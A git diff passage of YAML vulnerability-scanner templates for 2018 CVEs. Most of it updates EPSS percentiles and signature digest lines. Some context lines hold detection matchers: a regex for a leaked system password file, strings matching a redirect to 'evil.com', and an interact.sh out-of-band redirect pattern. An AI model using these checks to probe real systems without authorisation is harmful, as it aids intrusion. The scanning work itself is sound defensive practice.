4a0a004730450220549348711bc0d45ced6d351ab79af8fef524860c8489492e47d4bc0d5774caa10221009a58012c6b3f7f0cccb61125f26d51ce428426e74595e0b2fbe0aca8eb99549c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220549348711bc0d45ced6d351ab79af8fef524860c8489492e47d4bc0d5774caa10221009a58012c6b3f7f0cccb61125f26d51ce428426e74595e0b2fbe0aca8eb99549c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16668.yaml b/http/cves/2018/CVE-2018-16668.yaml index 3dc34c13ac..2eef63daf0 100644 --- a/http/cves/2018/CVE-2018-16668.yaml +++ b/http/cves/2018/CVE-2018-16668.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-16668 cwe-id: CWE-287 epss-score: 0.00248 - epss-percentile: 0.6252 + epss-percentile: 0.62538 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -44,4 +44,5 @@ http: - "** Platform sources **" - "** Application sources **" condition: and -# digest: 490a00463044022072ac3d470cd88de40d46d6e47862e7edd9aac3f7219054720cbc9b9023d742120220150dc79d038fb9f4a75c1fb8ce21c79e19e92bcd64ed26c25e251e4ace832227:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022072ac3d470cd88de40d46d6e47862e7edd9aac3f7219054720cbc9b9023d742120220150dc79d038fb9f4a75c1fb8ce21c79e19e92bcd64ed26c25e251e4ace832227:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16670.yaml b/http/cves/2018/CVE-2018-16670.yaml index 7dbcede263..87ec6d6173 100644 --- a/http/cves/2018/CVE-2018-16670.yaml +++ b/http/cves/2018/CVE-2018-16670.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-16670 cwe-id: CWE-287 epss-score: 0.00132 - epss-percentile: 0.47927 + epss-percentile: 0.47954 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -44,4 +44,5 @@ http: - "" - "Reader.STATUS" condition: and -# digest: 4a0a004730450220480601c230ceea33229d250e491590207d10e1c7d153cef074f231ea95018d13022100bedbd69a3c9f1d0d4cd74a8f638f5756d726726b50ed549d0bd156c15848d093:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220480601c230ceea33229d250e491590207d10e1c7d153cef074f231ea95018d13022100bedbd69a3c9f1d0d4cd74a8f638f5756d726726b50ed549d0bd156c15848d093:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16671.yaml b/http/cves/2018/CVE-2018-16671.yaml index b7a46b89b3..116faba295 100644 --- a/http/cves/2018/CVE-2018-16671.yaml +++ b/http/cves/2018/CVE-2018-16671.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-16671 cwe-id: CWE-200 epss-score: 0.00251 - epss-percentile: 0.62867 + epss-percentile: 0.62884 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: part: body regex: - "(19|20)\\d\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])" -# digest: 490a004630440220514c5d34c29684f52e8125f490a85d8f3050a2101f763ec61b682bf5d637227b02202d8795b230633e497c85be55734f6f99775c107ade27c79f0fbef9671f653e7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220514c5d34c29684f52e8125f490a85d8f3050a2101f763ec61b682bf5d637227b02202d8795b230633e497c85be55734f6f99775c107ade27c79f0fbef9671f653e7f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16716.yaml b/http/cves/2018/CVE-2018-16716.yaml index d3f84a7a47..2104f97278 100644 --- a/http/cves/2018/CVE-2018-16716.yaml +++ b/http/cves/2018/CVE-2018-16716.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-16716 cwe-id: CWE-22 epss-score: 0.00544 - epss-percentile: 0.74842 + epss-percentile: 0.74858 cpe: cpe:2.3:a:nih:ncbi_toolbox:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d37e5398878a9f1ee91f0f58faa5b2d09f3358b4cee0703ec0da3f235452743a02206d599eabda535de43b81e802ffa93deaeb09db150305b05cad2aa5df1af3c0cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d37e5398878a9f1ee91f0f58faa5b2d09f3358b4cee0703ec0da3f235452743a02206d599eabda535de43b81e802ffa93deaeb09db150305b05cad2aa5df1af3c0cb:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16761.yaml b/http/cves/2018/CVE-2018-16761.yaml index 4f30e7f41c..12cd2ee871 100644 --- a/http/cves/2018/CVE-2018-16761.yaml +++ b/http/cves/2018/CVE-2018-16761.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-16761 cwe-id: CWE-601 epss-score: 0.00068 - epss-percentile: 0.28481 + epss-percentile: 0.28494 cpe: cpe:2.3:a:eventum_project:eventum:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -38,4 +38,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022100e1d85856a04ab4c73cac62ac01864f00278b97d2e37dc67fcd7d05f5e207b2d202203510f417529079cca1d540a727323029311e9083bbbf72f4039e74b331ac6cf9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100e1d85856a04ab4c73cac62ac01864f00278b97d2e37dc67fcd7d05f5e207b2d202203510f417529079cca1d540a727323029311e9083bbbf72f4039e74b331ac6cf9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16763.yaml b/http/cves/2018/CVE-2018-16763.yaml index eaa28379dc..04b34b4646 100644 --- a/http/cves/2018/CVE-2018-16763.yaml +++ b/http/cves/2018/CVE-2018-16763.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-16763 cwe-id: CWE-74 epss-score: 0.83439 - epss-percentile: 0.98094 + epss-percentile: 0.98096 cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402200ea602508b759f3f7e8ca0358a5346290cd509315ec59f3d1dd655e844314f7002206dd5a122472b9afde2b8d2aa23912ce3c8f3a03e6f6ce49649ab03fdff90d83a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402200ea602508b759f3f7e8ca0358a5346290cd509315ec59f3d1dd655e844314f7002206dd5a122472b9afde2b8d2aa23912ce3c8f3a03e6f6ce49649ab03fdff90d83a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16836.yaml b/http/cves/2018/CVE-2018-16836.yaml index 7cd102a539..bd4d625f97 100644 --- a/http/cves/2018/CVE-2018-16836.yaml +++ b/http/cves/2018/CVE-2018-16836.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-16836 cwe-id: CWE-22 epss-score: 0.29944 - epss-percentile: 0.96408 + epss-percentile: 0.96411 cpe: cpe:2.3:a:rubedo_project:rubedo:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c5f075fa284fade54b84b2ae118effbd5875f82bd60712025009c5c25cc09160022100d09b34ec35720883c541f50553f51835ee3a9bd1b08d83141ec46aa5c972a33e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100c5f075fa284fade54b84b2ae118effbd5875f82bd60712025009c5c25cc09160022100d09b34ec35720883c541f50553f51835ee3a9bd1b08d83141ec46aa5c972a33e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16979.yaml b/http/cves/2018/CVE-2018-16979.yaml index d0be471746..37a0c1a341 100644 --- a/http/cves/2018/CVE-2018-16979.yaml +++ b/http/cves/2018/CVE-2018-16979.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-16979 cwe-id: CWE-113 epss-score: 0.00118 - epss-percentile: 0.45643 + epss-percentile: 0.45669 cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:* metadata: verified: true @@ -43,4 +43,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c43571f42164fa9889f5803dd3d4466d9219232faa3341460a0bac425928bc5f02210085754e659f8122489eca159dfdbee9c733209bfd547bddc423c6a2bfa5e267a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100c43571f42164fa9889f5803dd3d4466d9219232faa3341460a0bac425928bc5f02210085754e659f8122489eca159dfdbee9c733209bfd547bddc423c6a2bfa5e267a4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-17153.yaml b/http/cves/2018/CVE-2018-17153.yaml index 6f2de77777..d82b69c441 100644 --- a/http/cves/2018/CVE-2018-17153.yaml +++ b/http/cves/2018/CVE-2018-17153.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-17153 cwe-id: CWE-287 epss-score: 0.92144 - epss-percentile: 0.98647 + epss-percentile: 0.98648 cpe: cpe:2.3:o:western_digital:my_cloud_wdbctl0020hwt_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -47,4 +47,5 @@ http: - contains(body, "ganalytics") - status_code == 200 condition: and -# digest: 4a0a00473045022021cd8e66902fceacfeb1f9d706ba885886d032fc4115f1c069c914281b71e334022100d4b355ae724368ad9bb44303bf51236230dd3057eb0390eb25cf6daf2372b8ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022021cd8e66902fceacfeb1f9d706ba885886d032fc4115f1c069c914281b71e334022100d4b355ae724368ad9bb44303bf51236230dd3057eb0390eb25cf6daf2372b8ca:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-17246.yaml b/http/cves/2018/CVE-2018-17246.yaml index f8773eddec..3692d351ae 100644 --- a/http/cves/2018/CVE-2018-17246.yaml +++ b/http/cves/2018/CVE-2018-17246.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-17246 cwe-id: CWE-829,CWE-73 epss-score: 0.96913 - epss-percentile: 0.99622 + epss-percentile: 0.99623 cpe: cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -51,4 +51,5 @@ http: part: header words: - "application/json" -# digest: 490a00463044022043d0f5d48c551078341df23873208ee4f5cb95bc169b1d233bde069e617395f10220309835de1e526f9b5c6c882e3d7a43627ad4a7f0ee769fa5b6dbc1ac1f6b9154:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022043d0f5d48c551078341df23873208ee4f5cb95bc169b1d233bde069e617395f10220309835de1e526f9b5c6c882e3d7a43627ad4a7f0ee769fa5b6dbc1ac1f6b9154:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-17254.yaml b/http/cves/2018/CVE-2018-17254.yaml index 3b3a861178..e3560d86a1 100644 --- a/http/cves/2018/CVE-2018-17254.yaml +++ b/http/cves/2018/CVE-2018-17254.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2018-17254 cwe-id: CWE-89 epss-score: 0.81793 - epss-percentile: 0.98012 + epss-percentile: 0.98014 cpe: cpe:2.3:a:arkextensions:jck_editor:6.4.4:*:*:*:*:joomla\!:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: part: body words: - '{{md5(num)}}' -# digest: 490a00463044022001f330fdbe10fe296bf6b16985ca8f6457b0b4b66d784295de5e491d4e3cd0e102201f70a8bff9a3361e68ba2f6e0441030def774d6df2b4a3eaf1fdbd1cc2748d3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022001f330fdbe10fe296bf6b16985ca8f6457b0b4b66d784295de5e491d4e3cd0e102201f70a8bff9a3361e68ba2f6e0441030def774d6df2b4a3eaf1fdbd1cc2748d3a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml index 0260a92d99..df1716a63f 100644 --- a/http/cves/2018/CVE-2018-17422.yaml +++ b/http/cves/2018/CVE-2018-17422.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-17422 cwe-id: CWE-601 epss-score: 0.00118 - epss-percentile: 0.45643 + epss-percentile: 0.45669 cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:* metadata: verified: true @@ -40,4 +40,5 @@ http: words: - "self.location = 'http://evil.com'" - "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'" -# digest: 490a0046304402201e2b938447f35236c53b03d3ba20c75fb49a3163175e579c8d05a1f93826bfbf022061f6836e4b0c18d4cb3842bae323e39832c0a034c39844fa892c8cba4bc8a31b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402201e2b938447f35236c53b03d3ba20c75fb49a3163175e579c8d05a1f93826bfbf022061f6836e4b0c18d4cb3842bae323e39832c0a034c39844fa892c8cba4bc8a31b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-17431.yaml b/http/cves/2018/CVE-2018-17431.yaml index 1ef4ffb3ff..99948cd133 100644 --- a/http/cves/2018/CVE-2018-17431.yaml +++ b/http/cves/2018/CVE-2018-17431.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-17431 cwe-id: CWE-287 epss-score: 0.10458 - epss-percentile: 0.94381 + epss-percentile: 0.94387 cpe: cpe:2.3:a:comodo:unified_threat_management_firewall:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022012d52b6626a7493982f0c7516b1d8fd364a47dd5504f7d27d9ca77a48f02c465022030f8e8fede14c36b3568535b4ffa1d46a9aaa429462da4e178cca75793fbb2fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022012d52b6626a7493982f0c7516b1d8fd364a47dd5504f7d27d9ca77a48f02c465022030f8e8fede14c36b3568535b4ffa1d46a9aaa429462da4e178cca75793fbb2fd:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-18069.yaml b/http/cves/2018/CVE-2018-18069.yaml index 72829e1691..044b09f61c 100644 --- a/http/cves/2018/CVE-2018-18069.yaml +++ b/http/cves/2018/CVE-2018-18069.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-18069 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.43028 + epss-percentile: 0.43055 cpe: cpe:2.3:a:wpml:wpml:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -41,4 +41,5 @@ http: - 'contains(set_cookie, "_icl_current_admin_language")' - 'contains(body, "\">")' condition: and -# digest: 4a0a00473045022024af2c4c6c6b8270348b48f386e521664a15cc6e48a0f4cf2eec00c50ee0ad15022100fbbc4e15fdbea2d5a20a31d50223b7d4589f920a923c553a7861128e17fbae70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022024af2c4c6c6b8270348b48f386e521664a15cc6e48a0f4cf2eec00c50ee0ad15022100fbbc4e15fdbea2d5a20a31d50223b7d4589f920a923c553a7861128e17fbae70:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-18264.yaml b/http/cves/2018/CVE-2018-18264.yaml index c4ba06d5bf..714472df5d 100644 --- a/http/cves/2018/CVE-2018-18264.yaml +++ b/http/cves/2018/CVE-2018-18264.yaml @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 480a00453043021f6425a7d3d80db1549a8140c5a371350359c995e0fbf310db0bfd0ea748747f022055485e9067846b43eea352fae1e00f8bded413067ce30e2aa33d9f255b02cb4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 480a00453043021f6425a7d3d80db1549a8140c5a371350359c995e0fbf310db0bfd0ea748747f022055485e9067846b43eea352fae1e00f8bded413067ce30e2aa33d9f255b02cb4f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-18323.yaml b/http/cves/2018/CVE-2018-18323.yaml index 0a7e81b124..06a0cdfe96 100644 --- a/http/cves/2018/CVE-2018-18323.yaml +++ b/http/cves/2018/CVE-2018-18323.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-18323 cwe-id: CWE-22 epss-score: 0.97175 - epss-percentile: 0.9974 + epss-percentile: 0.99743 cpe: cpe:2.3:a:control-webpanel:webpanel:0.9.8.480:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d58fce7ffb54e3bca0b1ccae7d8dfce8d743abd7d3435324750b09a1cea606850220347fd010289bbc1859657a66e6d555fd01c6bc34bf48e16e6c42b717f6c9c411:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d58fce7ffb54e3bca0b1ccae7d8dfce8d743abd7d3435324750b09a1cea606850220347fd010289bbc1859657a66e6d555fd01c6bc34bf48e16e6c42b717f6c9c411:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-18570.yaml b/http/cves/2018/CVE-2018-18570.yaml index 194f192fee..ca375802eb 100644 --- a/http/cves/2018/CVE-2018-18570.yaml +++ b/http/cves/2018/CVE-2018-18570.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-18570 cwe-id: CWE-79 epss-score: 0.00098 - epss-percentile: 0.40522 + epss-percentile: 0.4055 cpe: cpe:2.3:a:planonsoftware:planon:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -44,4 +44,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ddfe557dbf8d6dc52f638ef3fbf21bd87f411450389b93157d9f7dcfd1fc42e20220154945d1b89858012a63fafc28d1c89a82e039244f0cd25a3340fb38e5e1d67a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100ddfe557dbf8d6dc52f638ef3fbf21bd87f411450389b93157d9f7dcfd1fc42e20220154945d1b89858012a63fafc28d1c89a82e039244f0cd25a3340fb38e5e1d67a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-18608.yaml b/http/cves/2018/CVE-2018-18608.yaml index ca0653d993..82a1bf702b 100644 --- a/http/cves/2018/CVE-2018-18608.yaml +++ b/http/cves/2018/CVE-2018-18608.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-18608 cwe-id: CWE-79 epss-score: 0.00177 - epss-percentile: 0.54781 + epss-percentile: 0.54795 cpe: cpe:2.3:a:dedecms:dedecms:5.7:sp2:*:*:*:*:*:* metadata: verified: true @@ -50,4 +50,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402202ef566d31253093ccf8d41e8154d5780dac8a74c8dc642849fd55309ffc18e48022065053e6a22e079a80657b2e7405c1172583c0b5b1ebbee7e1e01366e586caec1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402202ef566d31253093ccf8d41e8154d5780dac8a74c8dc642849fd55309ffc18e48022065053e6a22e079a80657b2e7405c1172583c0b5b1ebbee7e1e01366e586caec1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-18775.yaml b/http/cves/2018/CVE-2018-18775.yaml index 203b440eff..353a9451ab 100644 --- a/http/cves/2018/CVE-2018-18775.yaml +++ b/http/cves/2018/CVE-2018-18775.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-18775 cwe-id: CWE-79 epss-score: 0.00223 - epss-percentile: 0.60491 + epss-percentile: 0.60511 cpe: cpe:2.3:a:microstrategy:microstrategy_web:7:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100daa0da98ae23c82f54b32445c34f875c2b196f0d0dcfa100a0d1de13e8fcdd84022100b3a99b79f7bd8d806ebf7785b2e84a96dbcb9243fff0f9389632f416498bb5ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100daa0da98ae23c82f54b32445c34f875c2b196f0d0dcfa100a0d1de13e8fcdd84022100b3a99b79f7bd8d806ebf7785b2e84a96dbcb9243fff0f9389632f416498bb5ee:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-18777.yaml b/http/cves/2018/CVE-2018-18777.yaml index da4dfbab0a..885410e61f 100644 --- a/http/cves/2018/CVE-2018-18777.yaml +++ b/http/cves/2018/CVE-2018-18777.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-18777 cwe-id: CWE-22 epss-score: 0.00224 - epss-percentile: 0.60589 + epss-percentile: 0.60608 cpe: cpe:2.3:a:microstrategy:microstrategy_web:7:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e436bbbddb90e2e5c50661b8f42ee16dc9c4cc89996ad9dca8b632cc0b5cd3c4022100c5ee9b6aac04366893a89eb35bbae1713b079943bfe195dcb587740d1483a0a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100e436bbbddb90e2e5c50661b8f42ee16dc9c4cc89996ad9dca8b632cc0b5cd3c4022100c5ee9b6aac04366893a89eb35bbae1713b079943bfe195dcb587740d1483a0a1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-18778.yaml b/http/cves/2018/CVE-2018-18778.yaml index a926526e0a..cd1812c6fe 100644 --- a/http/cves/2018/CVE-2018-18778.yaml +++ b/http/cves/2018/CVE-2018-18778.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-18778 cwe-id: CWE-200 epss-score: 0.95125 - epss-percentile: 0.99089 + epss-percentile: 0.9909 cpe: cpe:2.3:a:acme:mini-httpd:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-18809.yaml b/http/cves/2018/CVE-2018-18809.yaml index 1d46aa943f..777ab48ab4 100644 --- a/http/cves/2018/CVE-2018-18809.yaml +++ b/http/cves/2018/CVE-2018-18809.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-18809 cwe-id: CWE-22 epss-score: 0.46465 - epss-percentile: 0.97051 + epss-percentile: 0.97053 cpe: cpe:2.3:a:tibco:jasperreports_library:*:*:*:*:activematrix_bpm:*:*:* metadata: verified: true @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022047eade9d5d1789268616c2bb9279f9990af97cd6159bb08a570e625c72c00b9d022100b370ed359ca3dd6d6d85eeadd7011af9112fd2e5f3823c5e6bbadf37ba37ef23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022047eade9d5d1789268616c2bb9279f9990af97cd6159bb08a570e625c72c00b9d022100b370ed359ca3dd6d6d85eeadd7011af9112fd2e5f3823c5e6bbadf37ba37ef23:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-18925.yaml b/http/cves/2018/CVE-2018-18925.yaml index c53d61f353..88bb66f899 100644 --- a/http/cves/2018/CVE-2018-18925.yaml +++ b/http/cves/2018/CVE-2018-18925.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-18925 cwe-id: CWE-384 epss-score: 0.09538 - epss-percentile: 0.94119 + epss-percentile: 0.94128 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -41,4 +41,5 @@ http: - type: dsl dsl: - 'status_code_1 == 500 && status_code_2 == 200 && contains(body_2, "")' -# digest: 4b0a00483046022100b19c8b74cb09be09b97ba4f10c08def739c3a799ac244705eae6cffec45074e402210093e1a481283c75a9e92c2e90dbde0b7876476144f368891edda97551e7f89b6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100b19c8b74cb09be09b97ba4f10c08def739c3a799ac244705eae6cffec45074e402210093e1a481283c75a9e92c2e90dbde0b7876476144f368891edda97551e7f89b6e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-19136.yaml b/http/cves/2018/CVE-2018-19136.yaml index e2e865e2ff..d8d543d5f3 100644 --- a/http/cves/2018/CVE-2018-19136.yaml +++ b/http/cves/2018/CVE-2018-19136.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-19136 cwe-id: CWE-79 epss-score: 0.00151 - epss-percentile: 0.512 + epss-percentile: 0.51218 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true @@ -56,4 +56,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402205b36e3bfb7a3af1b35ce3990daa5db37a62f37bca06d7bb6b7349ab53fc4780402200c9ef7634fc7cf219da6b408835432d4a8705d5a3a6bfaea0d87becc7d4531d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402205b36e3bfb7a3af1b35ce3990daa5db37a62f37bca06d7bb6b7349ab53fc4780402200c9ef7634fc7cf219da6b408835432d4a8705d5a3a6bfaea0d87becc7d4531d3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-19137.yaml b/http/cves/2018/CVE-2018-19137.yaml index 4a3c56d84b..f180309c2e 100644 --- a/http/cves/2018/CVE-2018-19137.yaml +++ b/http/cves/2018/CVE-2018-19137.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-19137 cwe-id: CWE-79 epss-score: 0.0008 - epss-percentile: 0.33809 + epss-percentile: 0.33837 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true @@ -55,4 +55,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220724b0fbbc29c1ca26f6cc234f1bbc02bc667d6529df81315956d19b46c5b2c9e0221009735401594775d4912459836084569244ecf2413e0ed1b0d9c27e2cda4cd1e33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220724b0fbbc29c1ca26f6cc234f1bbc02bc667d6529df81315956d19b46c5b2c9e0221009735401594775d4912459836084569244ecf2413e0ed1b0d9c27e2cda4cd1e33:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-19287.yaml b/http/cves/2018/CVE-2018-19287.yaml index f82bf54c81..551e80bde5 100644 --- a/http/cves/2018/CVE-2018-19287.yaml +++ b/http/cves/2018/CVE-2018-19287.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-19287 cwe-id: CWE-79 epss-score: 0.64483 - epss-percentile: 0.97516 + epss-percentile: 0.9752 cpe: cpe:2.3:a:ninjaforma:ninja_forms:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -60,4 +60,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ab39230dd06de4d30d8ee69324c5cbc090d9ed856389e763af6aa34b41479986022100d47e8e48e921aba29bcb22a8597bd4a6847845f7d4280d56708f334bab890cdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100ab39230dd06de4d30d8ee69324c5cbc090d9ed856389e763af6aa34b41479986022100d47e8e48e921aba29bcb22a8597bd4a6847845f7d4280d56708f334bab890cdf:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-19326.yaml b/http/cves/2018/CVE-2018-19326.yaml index ad390fb4dd..58b4604bb7 100644 --- a/http/cves/2018/CVE-2018-19326.yaml +++ b/http/cves/2018/CVE-2018-19326.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-19326 cwe-id: CWE-22 epss-score: 0.01158 - epss-percentile: 0.83322 + epss-percentile: 0.83338 cpe: cpe:2.3:o:zyxel:vmg1312-b10d_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -46,4 +46,5 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 4a0a00473045022100b11a92d0630951869266cf6835960f98df914e3be713701c45ab70349a2aa592022059919bbb1beeadbb4c067e5b09368cb9de0fa83fbdbf8641a989b2a7bb95dca7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100b11a92d0630951869266cf6835960f98df914e3be713701c45ab70349a2aa592022059919bbb1beeadbb4c067e5b09368cb9de0fa83fbdbf8641a989b2a7bb95dca7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-19365.yaml b/http/cves/2018/CVE-2018-19365.yaml index 686a38d142..6e5b6d0957 100644 --- a/http/cves/2018/CVE-2018-19365.yaml +++ b/http/cves/2018/CVE-2018-19365.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-19365 cwe-id: CWE-22 epss-score: 0.01612 - epss-percentile: 0.86055 + epss-percentile: 0.86065 cpe: cpe:2.3:a:wowza:streaming_engine:4.7.4.0.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210090b7c4edd4c127a79d86dc4abaf904d1824c80ea71d105ca09e9a2e6cb1828e5022100cb323237b584002fee5d16cf0f31b5ab2ca6ffbb74658eaa2d5d6078456a54a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 